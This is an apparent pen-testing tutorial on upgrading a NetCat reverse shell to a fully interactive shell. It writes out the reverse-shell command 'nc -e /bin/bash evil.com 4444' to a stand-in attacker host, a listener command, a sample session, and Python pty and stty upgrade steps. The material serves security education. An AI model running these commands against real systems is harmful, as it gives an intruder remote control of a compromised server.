NetCat shell upgrade
The holy grail during a pen test is a functioning shell. During a pen test, if the hacker managed to take over the server by being able to execute commands on the system, the hacker often sets up a connection to his server. NetCat is often used for this purpose. NetCat is a tool on Linux systems that allows you to control other programs over the Internet. However, one of the biggest frustrations for hackers is that the shell returned is quite limited. This binary can also be called ncat or nc depending on the system.
Hacking with NetCat
Suppose a hacker managed to upload a file called shell.php:
The hacker opens a port on his own server (evil.com) listening on port 4444. He does this with nc -lvp 4444
. Now the nc -e /bin/bash evil.com 4444
command is executed on the hacked server. The hacked server will now set up a connection to the hacker’s server. This is called a reverse tcp shell.
john@Technetium:~$ nc -lvp 4444
Listening on [0.0.0.0] (family 0, port 4444)
Connection from [1.2.3.4] port 4444 [tcp/*] accepted (family 2, sport 54490)
whoami
cyberant
^C
john@Technetium:~$ whoami
john
Above is what a hacker will see. When the hacker accidentally enters CTRL-C, the shell is no longer available. Also, commands that require interaction (such as su) do not work.
How to upgrade a Netcat Shell to an interactive shell?
The first step needed to improve this is to use Python to start an interactive shell. This can be done with Python’s PTY module, and works as follows:
python -c 'import pty; pty.spawn("/bin/bash")'
The above command produces a semi-interactive shell. That is, it is possible to use commands such as su
and mysql
, which ask for a password. The shell still closes itself with CTRL-C, and auto completion via TAB doesn’t work either. With a few simple commands (and a little magic) it is possible to go to a full shell.
If CTRL-Z
is run then the shell is moved to the background. It then types (in the local terminal):
stty raw -echo
fg
The above ensures that there is now a full shell, and can do everything that could be done via SSH, for example. Features such as tab completion and history now work. And VIM through NetCat? Sure!